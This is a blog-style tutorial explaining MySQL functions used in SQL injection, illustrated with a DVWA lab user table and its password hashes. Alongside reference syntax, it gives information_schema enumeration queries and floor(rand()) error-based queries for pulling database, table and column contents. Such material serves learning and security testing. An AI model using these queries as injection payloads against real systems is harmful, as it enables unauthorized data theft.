SQL injection: Understanding mysql command
SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. _OWASP
On this post, i’m going to introduce sql command that used on SQLi attack. Let’s go!
I use an example database as below:
user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+———+————+———–+———+———————————-+—————————————————-+———————+————–+
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | http://192.168.1.5/DVWA/hackable/users/admin.jpg | 2017-09-01 11:40:16 | 0 |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | http://192.168.1.5/DVWA/hackable/users/gordonb.jpg | 2017-09-01 11:40:16 | 0 |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | http://192.168.1.5/DVWA/hackable/users/1337.jpg | 2017-09-01 11:40:16 | 0 |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://192.168.1.5/DVWA/hackable/users/pablo.jpg | 2017-09-01 11:40:16 | 0 |
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | http://192.168.1.5/DVWA/hackable/users/smithy.jpg | 2017-09-01 11:40:16 | 0 |
The MID() Function
The MID() function is used to extract characters from a text field.
SQL MID() Syntax
SELECT MID(column_name,start,length) AS some_name FROM table_name;
The limit() Function
The SQL SELECT LIMIT statement is used to retrieve records from one or more tables in a database and limit the number of records returned based on a limit value.
SQL limit() Syntax
SELECT expressions
FROM tables
[WHERE conditions]
[ORDER BY expression [ ASC | DESC ]]
LIMIT number_rows [ OFFSET offset_value ];
- using limit() function to get table name:
select table_name from information_schema.tables where table_schema=database() limit 0,1;
-
Get the first character of the table name
select substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1) m;
MySQL CONCAT() Function
The CONCAT() function concatenates two or more expressions together.
MySQL concat() Syntax
CONCAT(expression1, expression2, expression3,…)
MySQL CONCAT_WS() Function
The CONCAT_WS() function concatenates two or more expressions together and adds a separator between them.
MySQL CONCAT_WS() syntax
CONCAT_WS(separator, expression1, expression2, expression3,…)
MySQL GROUP_CONCAT function
The MySQL GROUP_CONCAT function concatenates strings from a group into a single string with various options.
MySQL GROUP_CONCAT syntax
GROUP_CONCAT(DISTINCT expression
ORDER BY expression
SEPARATOR sep);
MySQL COUNT() Function
The COUNT() function returns the number of records in a select query.
mysql count() syntax
COUNT(expression)
MySQL RAND() Function
The RAND() function returns a random number or a random number within a range.
The RAND() function will return a value between 0 (inclusive) and 1 (exclusive).
The RAND() function will return a completely random number if no seed is provided, and a repeatable sequence of random numbers if a seed value is used.
MySQL rand() syntax
RAND(seed)
MySQL FLOOR() Function
The FLOOR() function returns the largest integer value that is less than or equal to a number.
MySQL FLOOR() syntax
FLOOR(number)
- Using floor function to get database:
select count(*),(concat(0x3a,database(),0x3a,floor(rand()*2))) first_name from information_schema.tables group by first_name; - Using floor function to get table name:
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name; - Using floor function to get content:
select count(*),concat(0x3a,0x3a,(select first_name from users limit 1,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
SQL GROUP BY Statement
The GROUP BY statement is often used with aggregate functions (COUNT, MAX, MIN, SUM, AVG) to group the result-set by one or more columns.
sql group_by syntax
SELECT column_name(s)
FROM table_name
WHERE condition
GROUP BY column_name(s)
ORDER BY column_name(s);
MySQL SUBSTR() Function
The SUBSTR() function extracts a substring from a string (starting at any position).
MySQL substr() syntax
SUBSTR(string, start, length)
or
SUBSTR(string FROM start FOR length)
